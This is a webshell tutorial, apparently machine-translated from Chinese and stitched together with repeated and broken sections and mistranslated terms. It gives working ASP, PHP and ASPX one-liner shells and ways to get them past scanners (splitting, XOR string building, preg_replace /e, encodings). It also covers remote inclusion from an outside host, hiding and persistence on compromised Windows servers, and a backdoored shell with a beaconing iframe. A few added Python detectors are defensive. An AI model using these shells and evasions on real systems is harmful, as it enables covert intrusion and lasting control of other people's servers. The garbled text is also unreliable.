ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
2. Truncation upload
3. Backend database backup
4. Use database statements to upload
(1) mysql database into outfile
(2) Create a new table and write the Trojan into it
Some open-source CMSes and home-made webshells have a database management function, and that function usually has an SQL query box. First run `create table shell (code text);`, which creates a table named shell with a single column named code of type text. Then run `insert into shell(code) values('<one-liner webshell>');`, which stores the one-liner in the code column of the shell table. Finally use the custom backup function to back the table up to a file named `x.php;x`; on a server whose parser ignores everything after the `;`, the file is parsed as PHP and the one-liner executes. The name `x.php;x` is not a rule: different web servers run different service programs with different filtering rules, so another name or another trick may be needed.

(3) phpMyAdmin misconfiguration
phpMyAdmin is a tool for managing a website's database, and config.inc.php is its configuration file. If, when you look at that file, `$cfg['Servers'][$i]['auth_type']` is left at 'config' (the default in old versions), the database credentials are stored in the configuration file and anyone who can reach phpMyAdmin is logged in to the database without being asked for a password. The stored account is often root, i.e. the administrator, so the login has the highest privileges. However, root can usually only log in locally, so create a user that is allowed to log in remotely, log in with it, create a table and write the one-liner into it (then export it to a file as in (2)).

3. The "security" of a webshell
1. Hiding the webshell
When uploading a webshell you must hide it. The first purpose of hiding it is to stop the site administrator from discovering and deleting it; the second is to stop other attackers from discovering the file and using it.

(1) Hiding a Da Ma (big webshell)
① The undeletable file
Windows reserves a set of device names and does not allow a file or folder to be given one of them: aux, prn, con, nul, com1 to com9 and lpt1 to lpt9. A file with such a name can nevertheless be created with the copy command by using the `\\.\` device-path prefix, which bypasses the normal name check:

```
c:\>copy 3.asp \\.\C:\aux.asp
```

This creates aux.asp in the root of drive C. The file cannot be deleted from the graphical interface; to delete it you must use the del command with the same prefix (`del \\.\C:\aux.asp`). There is no prompt after deletion, but the file is indeed gone. Although this gives a webshell that cannot be removed from Explorer, if it is placed directly in the web root an experienced administrator who notices it will still remove it.

② CLSID hiding
Every COM class in Windows has a CLSID. If you name a folder x.{CLSID}, Explorer treats the folder as the object that CLSID stands for (the two commands used to create it are shown only in screenshots, which are not reproduced). Clicking it opens, for example, the Control Panel, but it is in fact still a folder and the Da Ma inside it still exists. Naming a folder after the CLSID of a real system object confuses administrators: for instance, go into the Recycle Bin folder, create a folder named with the Recycle Bin's CLSID, and copy a reserved-name .asp file (such as aux.asp above) into it. You can also use

```
attrib +h +s +r /s /d
```

to change the attributes of the file and hide it. Windows does not show hidden files by default, and the Recycle Bin folder is created automatically, so an "immortal" webshell can be hidden on the server this way.
③ Driver-level hiding
The principle: when a folder is opened, the Windows file system driver receives an IRP_MJ_DIRECTORY_CONTROL request. The handler allocates a buffer, enumerates the entries under the folder and stores the results in that buffer. A filter driver hooks this enumeration, compares each entry against the names to hide and, when a name matches, drops that folder or file from the listing. As I understand the code, when it reaches the target entry it advances the pointer walking the buffer by the size of that entry and skips straight over it, so the hidden item is never returned. Although there is plenty of C source for this technique online, it is hard to get working because of header-file and system dependencies (the file systems of different Windows versions differ). Instead I found the Easy File Locker program online; it has to be installed on the web server and permissions set on the target file (screenshots not reproduced).

The permission settings are readable, writable, deletable and visible; clearing "visible" hides the file. Because the directory enumeration is bypassed rather than the file being moved, the hidden file can still be opened by its absolute path. My understanding is that these four files do the work:

```
C:\WINDOWS\xlkfs.dat
C:\WINDOWS\xlkfs.dll
C:\WINDOWS\xlkfs.ini
C:\WINDOWS\system32\drivers\xlkfs.sys
```

They replace the normal directory lookup: access to a hidden file by absolute path no longer goes through the ordinary path query but through these four files, which amounts to a separate driver for the hidden files. To avoid being noticed by the administrator you can uninstall the Easy File Locker program, but you must not delete these four files; after the program is removed the file is still reachable by its absolute path, which is exactly the hidden-backdoor behaviour wanted.

④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. Under this key there is a CheckedValue value; change it to 0 (if there is no CheckedValue, create a DWORD with that name and set it to 0). Files created with the hidden attribute are then completely hidden: even with "Show hidden files" turned on in Folder Options they are not displayed.

(2) Hiding a one-liner webshell
① Hiding via include
Some script files on a site contain include statements, and you can use this inclusion mechanism to pull in the file holding the one-liner: when the page is visited, the one-liner is executed along with it. In ASP the include directive is `<!--#include file="path"-->`; fill in the path directly, where the path is the path on the web server.

You can use the tool Webmaster Stop to write the one-liner into an image as an NTFS alternate data stream: change the `\` before the file name in the path to `:` (image.jpg:shell.asp), after which the image no longer displays and the stream does not show in a directory listing. Then find an .asp file on the web server and write an include statement pointing at it at the top of that file. The PHP include statement is:

```php
<?php include($include); ?>
```

Here `$include` can be an external path, for example:

http://www.aaa.com/1.php?include=http://www.bbb.com/hehe.php

where 1.php on aaa contains

```php
<?php include($include); ?>
```

which includes the named file (this relies on register_globals to turn the query parameter into `$include`, and on allow_url_include for a remote path; on current PHP you would read `$_GET['include']` explicitly and allow_url_include is off by default). bbb is an external server, and it must not execute PHP itself: otherwise hehe.php (the one-liner) runs on bbb and only its output reaches aaa, so nothing executes on aaa.
② Hiding the one-liner in a configuration file (PHP)
Once you have a PHP webshell you can edit php.ini to hide the one-liner. One php.ini feature prepends or appends the contents of a chosen file to every page, the "header and footer" directives; set the header with

auto_prepend_file = hehe.php

Then look at include_path, for example

include_path = ".;E:\PHPnow-1.5.6\htdocs"

This setting lists the directories in which the header and footer files are looked up; the rule is "path1;path2", and because the first entry is '.', the current directory, a hehe.php placed next to the site's home page is found there, which is equivalent to adding it to the home page. Write the one-liner into hehe.php and PHP's prepend feature injects it into the site's home page without touching the page's own source.

③ 404 small webshell
A 404 small webshell shows a "page not found" 404 page when visited, but the Trojan code has in fact already run. Generally it is called out by pressing Shift five times.

4. One-liner webshell anti-detection
1. Constructing strings to bypass detection (PHP)
Detection programs generally match strings such as "_POST", "system" and "call_user_func_array", so building those strings at run time can bypass some of them. The basic idea is that every character in PHP is a byte value, and one character of the shell can be replaced by the XOR of two other characters. For example:

```php
<?php
@$_++;   // $_ starts unset (null); ++ makes it 1
$__ = ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");   // "_" "P" "O" "S" "T": $__ is "_POST"
@${$__}[!$_](${$__}[$_]);   // ${"_POST"}[0](${"_POST"}[1]), i.e. $_POST[0]($_POST[1])
?>
```

The result is `@$_POST[0]($_POST[1])`: `!$_` is the negation of 1, and since 1 is true its negation is false, which as an array key is 0. The request is then `0=system&1=whoami`. This bypass is weak, however: a scanner that folds the constant XOR expressions (or simply matches the pattern of quoted single characters joined by `^` and `.`) recovers the byte values and still flags "_POST".
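Added example, not code from the original article: a Python script showing both sides of the XOR construction above. `xor_pairs()` builds character pairs the way the one-liner does (any pair of printable punctuation characters whose XOR gives the target byte, so the generated expression contains no letters or digits for a signature to match), and `fold_xor_strings()` is the scanner-side check the caveat calls for: it constant-folds every `("x"^"y")` term and the `.` concatenations between them, after which a plain `_POST` signature matches again. The sample shell is the one quoted above; the function and variable names are my own.

```python
import re

# The XOR-built one-liner from the text above, embedded here as a constructed sample.
SAMPLE_XOR_SHELL = r'''<?php
@$_++;
$__ = ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
?>'''

# Printable punctuation only: letters and digits would give a scanner something to match,
# and quotes, backslash and $ would break the PHP string literal.
PUNCT = [c for c in map(chr, range(0x21, 0x7F)) if not c.isalnum() and c not in '"\'\\$']


def xor_pairs(target):
    """For each character of target, choose two punctuation characters whose XOR is that character."""
    pairs = []
    for ch in target:
        for a in PUNCT:
            b = chr(ord(a) ^ ord(ch))
            if b in PUNCT:
                pairs.append((a, b))
                break
        else:
            raise ValueError("no punctuation pair produces %r" % ch)
    return pairs


def php_xor_expr(target):
    """Render the pairs as the PHP expression the one-liner uses, e.g. ("#"^"|").("."^"~")..."""
    return ".".join('("%s"^"%s")' % (a, b) for a, b in xor_pairs(target))


# Scanner side: one single-character XOR term such as ("#"^"|") or ('#'^'|').
XOR_TERM = re.compile(r'\(\s*(["\'])(.)\1\s*\^\s*(["\'])(.)\3\s*\)')
# Two adjacent double-quoted literals joined by the PHP concatenation operator.
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')


def fold_xor_term(match):
    """Evaluate one matched ("x"^"y") term to the character it produces."""
    return chr(ord(match.group(2)) ^ ord(match.group(4)))


def fold_xor_strings(src):
    """Constant-fold XOR terms and their concatenations so the built string appears literally."""
    folded = XOR_TERM.sub(lambda m: '"' + fold_xor_term(m).replace('"', '\\"') + '"', src)
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', folded)
        if merged == folded:
            return folded
        folded = merged


SUPERGLOBAL = re.compile(r'_(?:POST|GET|REQUEST|COOKIE|SERVER)\b')


def find_superglobals(src):
    """Signature check run on the folded source: names the shell builds at run time become visible."""
    return set(SUPERGLOBAL.findall(fold_xor_strings(src)))
```

Run `find_superglobals(SAMPLE_XOR_SHELL)` and it returns `{"_POST"}` even though the raw file never contains that string; `php_xor_expr("_POST")` produces a fresh expression of the same shape, and folding it gives the same answer, which is why the text calls this bypass weak.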
2. Regular-expression replacement (PHP)
PHP's preg_replace() performs regular-expression replacement. Using it to bypass detection relies on a language feature: with the /e modifier, the replacement string is evaluated as PHP code after substitution, so if the text substituted into it contains code, that code runs.

```php
<?php
function funfunc($str) {
}
// /e evaluates the replacement as PHP; \1 is the captured text. The tag name in the
// pattern was lost from the page, which describes it as the HTML title tag; <title> is assumed.
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\\1")', $_POST["cmd"]);
?>
```

The code above is a substitution: first define an empty function, then use preg_replace to replace the tag content in the cmd form field with a call to funfunc. The value posted in the form is

`{${phpinfo()}}`

wrapped in the tag the pattern captures (phpinfo() can of course be replaced with another call). After substitution the replacement becomes funfunc("{${phpinfo()}}"), and because ${} inside a double-quoted string is evaluated, phpinfo() runs. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works on old interpreters.

3. Generating the shell on the fly (PHP)
When using file inclusion, the included PHP file is easily found by a scanner. Instead, use file_put_contents() to create a file with the one-liner written into it, generating the shell immediately before visiting it. file_put_contents is itself a sensitive function, though, and is easily flagged.

4. Evasion (ASP)
Because some ASP servers filter the usual one-liner, you can write the same thing in another form:

```asp
<script language="VBScript" runat="server">execute request("cmd")</script>
```

The function is identical; only the form changes. The same idea applied to a different scripting language gives the ASPX one-liner:

```aspx
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script>
```
Here the one-liner is written in C#.

5. Splitting (ASP)
Split the one-liner into two statements. The chance of a bypass is small, but it is still a technique: a server may run many sophisticated scans and yet miss small things. There is also an enhanced splitting method:

```asp
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
```

Both lines use an if statement to separate the pieces. The central idea is to split the sensitive characters: the usual ASP signature is eval(request or execute(request, and once it is split the signature no longer matches, so the scanner is bypassed directly.

6. Garbled deformation (ANSI -> Unicode encoding)

```asp
<%execute request("#")%>
```

saved in Unicode (UTF-16) encoding appears, to a scanner that reads the file as ANSI, as "┼攠數畣整爠煥敵瑳∨∣┩愾", which matches no signature, while the ASP engine still parses the Unicode file correctly.

```asp
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
```

The line above uses ASCII encoding: chr(114) is the character with ASCII code 114, i.e. r, and the seven chr() calls spell out request. Converted back, the code is

```asp
<%eval(request("brute"))%>
```
7. Da Ma anti-detection
(1) base64 encoding
A Da Ma can be protected by compressing its code, base64-encoding the compressed result, and appending at the end of the file

```php
<?php @eval(gzinflate(base64_decode($code))); ?>
```

to run it: `$code` holds the base64 text, which is decoded, decompressed by gzinflate and executed by eval. In practice this is not real protection: base64_decode, gzinflate and eval are all on signature lists, so the file is still flagged when it passes through a scanner.

(2) ROT13 encoding (PHP)
str_rot13 is a PHP encoding function that can be applied to script code to evade signature matching (the screenshot of the example is not reproduced). In it, strrev reverses a string, and to evade signatures the function names are also broken up with '.' concatenation. The three strings encoded with str_rot13 are, in order, gzinflate, str_rot13 and base64_decode, so the payload is wrapped three times and the gzinflate and base64_decode signatures no longer appear in plain text. str_rot13 itself cannot be hidden this way, and some scanners use str_rot13 as a signature too. ROT13 means "rotate by 13": each letter is replaced by the letter 13 positions further along the alphabet, so applying it twice returns the original. Because the algorithm is fixed, the protection is weak, and undoing it is trivial: apply it once more.

(3) Other encodings
Antivirus software and scanners generally use signatures to decide whether a file is malicious. When hardening a Da Ma, a small shell or a one-liner, the usual approach is to use the built-in PHP or ASP encoding functions (base64, rot13 and so on) to bypass the scanner, but you can also write your own encoding algorithm and apply it to the script code to get rid of particular signatures. Borrow ideas from the Caesar cipher and other shift ciphers, write the routine, encode the script with it, and the base64 and rot13 signatures disappear; or, with less effort, encode only the signature strings with the home-made routine and decode them when they are used. You can also use keyed algorithms such as DES or RSA. A Da Ma generally has a password login box; tie the login password to the decryption key so the code can only be decoded once the correct password is entered. On one hand this evades scanners and antivirus, on the other it is convenient: even if someone else obtains this Da Ma they cannot decrypt it and see the source.
5. About backdoors in webshells
The Da Ma you download online will more or less always carry a backdoor, and these backdoors lead directly to the sites we compromise being taken over by someone else, so a downloaded Da Ma must first be checked for backdoors. Take this "universal password" as an example, a fragment of the login code:

```asp
end function
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then session("hehe")=userpass : response.redirect url else
```

Here

`request.form("pass")=userpass`

was originally the check of the pass value: if the entered pass equals userpass, verification succeeds. But the later

`or request.form("pass")="1111111"`

means that if the entered pass is 1111111 you can also log in to the Da Ma. Of course it cannot always be this simple: the original author may assign userpass in two places and add a trigger condition that changes userpass when something happens on login (for example, a failed login triggers an update of userpass, such as appending a suffix), and the trigger code and the verification code may be far apart and hard to find. Then the Da Ma must be analysed line by line.
Then the author mounts the shell with a frame:

```html
<iframe src="backdoor address" width=0 height=0></iframe>
```

With width and height set to 0 the frame is invisible on the page. The "backdoor address" points to the author's own receiving script, which he places on a public server he has set up. The receiving script is:

```asp
<%
url = Request.ServerVariables("HTTP_REFERER")
set fs = server.CreateObject("Scripting.FileSystemObject")
set file = fs.OpenTextFile(server.MapPath("hehe.txt"), 8, True)
file.writeline url
file.close
set file = nothing
set fs = nothing
%>
```

where

`url = Request.ServerVariables("HTTP_REFERER")`

reads the Referer header of the request, i.e. the URL of the Da Ma page that embedded the frame, and appends it (mode 8 is append) to hehe.txt in the script's directory. Every victim that opens the backdoored shell thus reports the shell's own address to its author.

To remove this kind of backdoor, first disable the second password check in the Da Ma, the master password: delete the corresponding code. Then check whether the ASP Da Ma page contains a hidden URL such as an iframe with width=0 height=0, find it and delete it.
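Added example (my own code, not the article's): a Python check for the two backdoors this section describes in a downloaded Da Ma, which is what the removal advice above amounts to when done systematically. `hidden_beacons()` lists every iframe, img or frame that is zero-sized or hidden by CSS together with where it points, and `literal_credentials()` finds every place a request parameter is compared against a hardcoded string, which is how the "1111111" universal password shows up next to the legitimate `=userpass` comparison. The sample ASP login block and the collector host in it are constructed for the example.

```python
import re

# Constructed sample of a downloaded ASP Da Ma login block carrying both backdoors
# described in the text: a universal password and a zero-sized iframe reporting to the author.
SAMPLE_DAMA = r'''<%
userpass = "admin888"
if session("hehe") = "" then
    if request.form("pass") = userpass or request.form("pass") = "1111111" then
        session("hehe") = userpass
        response.redirect url
    end if
end if
%>
<html><body>
<iframe src="http://collector.example/hehe.asp" width=0 height=0></iframe>
<img src="http://collector.example/p.gif" style="display:none">
</body></html>'''

TAG = re.compile(r'<(iframe|img|frame)\b([^>]*)>', re.I)
SRC = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
ZERO_SIZE = re.compile(r'\b(?:width|height)\s*=\s*["\']?0\b', re.I)
HIDDEN_CSS = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)


def hidden_beacons(src):
    """Return the src of every iframe/img/frame that is zero-sized or hidden by CSS."""
    hits = []
    for m in TAG.finditer(src):
        attrs = m.group(2)
        if ZERO_SIZE.search(attrs) or HIDDEN_CSS.search(attrs):
            s = SRC.search(attrs)
            hits.append(s.group(1) if s else "(no src)")
    return hits


# ASP:  request.form("pass") = "literal"        PHP:  $_POST['pass'] == 'literal'
LITERAL_CMP = re.compile(
    r'request(?:\.form|\.querystring)?\s*\(\s*["\'](\w+)["\']\s*\)\s*=\s*["\']([^"\']*)["\']'
    r'|\$_(?:POST|GET|REQUEST|COOKIE)\s*\[\s*["\'](\w+)["\']\s*\]\s*===?\s*["\']([^"\']*)["\']',
    re.I)


def literal_credentials(src):
    """Return (parameter, literal) for each comparison of user input against a hardcoded string."""
    found = []
    for m in LITERAL_CMP.finditer(src):
        if m.group(1) is not None:
            found.append((m.group(1), m.group(2)))
        else:
            found.append((m.group(3), m.group(4)))
    return found


def triage(src):
    """Summarise both checks; a clean shell yields no beacons and no literal credentials."""
    beacons = hidden_beacons(src)
    creds = literal_credentials(src)
    return {"beacons": beacons, "credentials": creds, "backdoored": bool(beacons or creds)}
```

A comparison against a variable such as `userpass` is deliberately not reported, so on a clean shell `triage()` returns no findings; the trigger-based variants the text mentions (userpass rewritten elsewhere on a failed login) still need the line-by-line reading it recommends, since they contain no literal at the comparison site.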
The above has covered the implementation of webshells and the exploration of how they are hidden, including the aspects listed. I hope it is helpful to friends interested in PHP tutorials.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
3. The "security" of webshell
1. Regarding the hiding of webshell
(1) Hiding a Da Ma (big Trojan)
① Undead zombie files
Windows has reserved device names that it does not allow as folder or file names: aux, prn, con, nul, com1 to com9 and lpt1 to lpt9. Files with these names can nevertheless be created with the Windows copy command and a device path prefix, such as:
c:\>copy 3.asp \\.\C:\aux.asp
This creates aux.asp on the C: drive. The file cannot be deleted from the graphical interface; deleting it requires the del command. There is no prompt after deletion, but the file is indeed gone. Although this method produces a webshell that cannot be deleted through the graphical interface, if it is placed directly in the web root an experienced administrator will still notice it and delete it.
② CLSID hiding
Every program (shell object) in Windows has a CLSID. If you name a folder x.{program CLSID} and then create it with two commands, clicking on it after creation opens the Control Panel, but it is in fact still a folder and the Da Ma inside it still exists. Naming a folder with the CLSID of the corresponding object can confuse administrators: for example, inside the recycle bin folder create such a folder with the Recycle Bin's CLSID and copy a reserved-name .asp file into it. You can also use
attrib +h +s +r /s /d
to change the file attributes and hide the files. Windows does not display hidden files by default, and the recycle bin folder is created automatically, so an "immortal" webshell can be hidden on the server.
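As an added example (not from the original article), the defender's counterpart of the two tricks above: a Python audit that flags files whose stem is a reserved device name and folders or files carrying a .{CLSID} suffix, including scripts stored inside such a folder. The sample paths are constructed; the CLSID in them is the Recycle Bin's, the object the article suggests imitating.

```python
"""Audit web-root paths for reserved device names and CLSID-suffixed folders.

Added example, not from the article. Pure string checks, so it runs anywhere;
walk_webroot() feeds it real paths on the server. Sample paths are constructed.
"""
import os
import re

RESERVED = {"con", "prn", "aux", "nul"} | {"com%d" % i for i in range(1, 10)} \
    | {"lpt%d" % i for i in range(1, 10)}
SCRIPT_EXT = {".asp", ".asa", ".aspx", ".cer", ".php", ".jsp"}
# name.{GUID}: Explorer shows the object with that CLSID instead of a folder.
CLSID_SUFFIX = re.compile(r"\.\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)


def split_path(path):
    """Split a Windows or POSIX path into its components without touching disk."""
    return [c for c in re.split(r"[\\/]+", path) if c]


def is_reserved(name):
    """Windows reserves the stem before the first '.', case-insensitively,
    so aux.asp or COM1.php cannot be deleted from Explorer."""
    return name.split(".")[0].rstrip(" ").lower() in RESERVED


def audit_paths(paths):
    """Return (kind, path) findings for every suspicious path."""
    findings = []
    for path in paths:
        parts = split_path(path)
        if not parts:
            continue
        name = parts[-1]
        if is_reserved(name):
            findings.append(("reserved-device-name", path))
        if CLSID_SUFFIX.search(name):
            findings.append(("clsid-suffixed-name", path))
        inside_clsid = any(CLSID_SUFFIX.search(c) for c in parts[:-1])
        if inside_clsid and os.path.splitext(name)[1].lower() in SCRIPT_EXT:
            findings.append(("script-inside-clsid-dir", path))
    return findings


def walk_webroot(root):
    """Yield every directory and file under root. os.walk does not honour the
    hidden/system attributes, so attrib +h +s files are still listed."""
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            yield os.path.join(dirpath, entry)


# Constructed sample web-root listing (Recycle Bin CLSID used as the suffix).
SAMPLE_PATHS = [
    r"C:\inetpub\wwwroot\index.asp",
    r"C:\inetpub\wwwroot\aux.asp",
    r"C:\inetpub\wwwroot\images\COM1.php",
    r"C:\inetpub\wwwroot\x.{645FF040-5081-101B-9F08-00AA002F954E}",
    r"C:\inetpub\wwwroot\x.{645FF040-5081-101B-9F08-00AA002F954E}\con.asp",
    r"C:\inetpub\wwwroot\upload\photo.jpg",
]

if __name__ == "__main__":
    for kind, path in audit_paths(SAMPLE_PATHS):
        print(kind, path)
```

On a live server replace SAMPLE_PATHS with walk_webroot(r"C:\inetpub\wwwroot"); reserved-name files then have to be removed with the \\.\ device path, as the del step above requires.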
③ Driver-based hiding
The principle: in the Windows file system, when a folder is opened the system issues an IRP_MJ_DIRECTORY_CONTROL request. This request allocates a buffer and traverses the entries under the folder, storing the results in the buffer. During the traversal it compares each name with the target file name, and on a match the folder or file is skipped. On how the skip works, I looked at the code; my understanding is that when the target is found, the entry's offset is added to the traversal pointer, so the target is passed over without being listed. Although there are many C sources for this on the Internet, it is hard to operate because of the header files and system support required (file systems differ between Windows versions). I found the Easy File Locker program online; it has to be installed on the web server and permissions set on the target file.
The permission settings are readable, writable, deletable and visible.
The screenshot shows the file hidden. As mentioned above, because the traversal is bypassed rather than the file removed, it can still be opened by its absolute path. My understanding is that the following four files take over the lookup:
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
These four files replace the traversal query: opening a hidden file by its absolute path does not go through the normal lookup but through these four files, which amounts to a separate driver for the hidden files. So as not to be discovered by the administrator, you can uninstall the Easy File Locker program, but the four files above must not be deleted; after the program is removed the file can still be opened by entering its absolute path, which hides the backdoor.
A related trick for a one-sentence Xiao Ma: use Webmaster Stop to write it into an NTFS alternate data stream of an image file. Once the stream (addressed with ':' in the path) has been written, the image no longer displays. Then find an asp file on the web server and put an include statement (PHP or ASP, whichever the file uses) at the beginning of the file, filling in the path directly; the path is the file's path on the web server.
④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. Under this path there is a CheckedValue key; change it to 0. If there is no CheckedValue key, create one directly and set it to 0. Hidden files created afterwards are then completely hidden: even if "Show all files" is turned on under Folder Options, they are not displayed.
(2) Hiding of one-sentence Trojans
① Hiding through header-file inclusion
Some script files on the web contain include statements. You can use this inclusion mechanism to pull in the one-sentence file; when the page is accessed, the sentence is called directly:
<?php include($include); ?>
$include here can be an external path such as:
http://www.aaa.com/1.php?include=http://www.bbb.com/hehe.php
The content of 1.php on aaa is
<?php include($include); ?>
which means inclusion. bbb is an external server, provided that this server does not execute PHP; otherwise hehe.php (the one-sentence Trojan) would be executed on the bbb server and not on aaa.
② Hiding the sentence in a configuration file (PHP)
After getting a PHP webshell, you can edit php.ini to hide the file. One of its options prepends the contents of a given file to every page (header and footer):
auto_prepend_file = hehe.php
Then look at
include_path = "E:\PHPnow-1.5.6\htdocs;."
This setting gives the locations from which the prepended header and footer files are loaded. The rule is "path1;path2", meaning the header and footer files in the listed folders are added to the files served; the '.' here is the current (root) path, which is equivalent to attaching them to the home page. Then write the one sentence into hehe.php and, through PHP's auto-prepend function, the sentence is inserted into the website's home page.
③ 404 Xiao Ma
The 404 Xiao Ma shows a 404 "page not found" page when accessed, but in fact the Trojan code has already been executed. Generally it can be called up by pressing Shift five times.
4. Anti-kill for one-sentence webshells
1. Construction method to bypass detection (PHP)
General detection programs filter strings such as "_POST", "system" and "call_user_func_array". Sometimes a construction method can bypass some of these programs. The basic principle is that every character in PHP corresponds to a binary value, so a character in the Trojan can be replaced by the XOR of two other characters. For example, in the code
<?php
@$_++;            // $_ is undefined, so ++ makes it 1
$__ = ("#"^"|");  // '_'
$__ .= ("."^"~"); // 'P'
$__ .= ("/"^"`"); // 'O'
$__ .= ("|"^"/"); // 'S'
$__ .= ("{"^"/"); // 'T'
?>
the pieces are assembled, and the one-sentence Trojan can then be written as
<?php
@$_++;
$__ = ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // the value of $__ is _POST
@${$__}[!$_](${$__}[$_]);
?>
The result is @$_POST[0]($_POST[1]); !$_ is the negation of 1, and since 1 is true in the language, its negation is 0 (false). But this bypass is quite weak: thinking it through, even though each character is written as the XOR of two characters, the binary value of the function name is still recovered on a second pass, so the value in hex form will still be killed.
2. Regular expression replacement method (PHP)
PHP has the function preg_replace(), which performs regular-expression replacement. Using replacement to bypass the detection system also relies on a feature of PHP functions: when a function is called, if the value supplied for a parameter contains a command, the command is executed.
<?php
function funfunc($str) {}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
The code above is a replacement process. First an empty function is created; then preg_replace replaces the <title>...</title> part of the posted cmd value with a call to funfunc. If the value posted in the form is <title>{${phpinfo()}}</title> (phpinfo() can of course be replaced by other commands), the replacement becomes funfunc("{${phpinfo()}}"); because the /e modifier evaluates the replacement as PHP code and ${} inside a double-quoted string is parsed, phpinfo() runs. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this only works on older PHP.)
3. Instant generation method (PHP)
When using header-file inclusion, the included PHP file is easily found by scanners. Instead, file_put_contents can create the file with the one sentence written into it, generating the Trojan just before it is accessed. But this function is itself sensitive and easily killed.
4. Avoidance method (asp)
Because some asp servers filter to block one-line Trojans, you can use:
<script language=VBScript runat=server>execute request("cmd")</script>
The function is the same; only the form changes. Avoiding a specific script language: an aspx one-sentence Trojan
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script>
Here the one-sentence Trojan is written in C#.
5. Split method (asp)
Split the sentence into pieces. Although the chance of bypassing is small, it is still a bypass technique: a server may have many elaborate scanning methods yet miss small things. There is also an enhanced split method:
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
The two lines above use an if statement to separate the parts. The central idea is to split the sensitive characters: the usual asp signature is eval(request or execute(request, and once it is split the signature is not matched, so the scanner is bypassed directly.
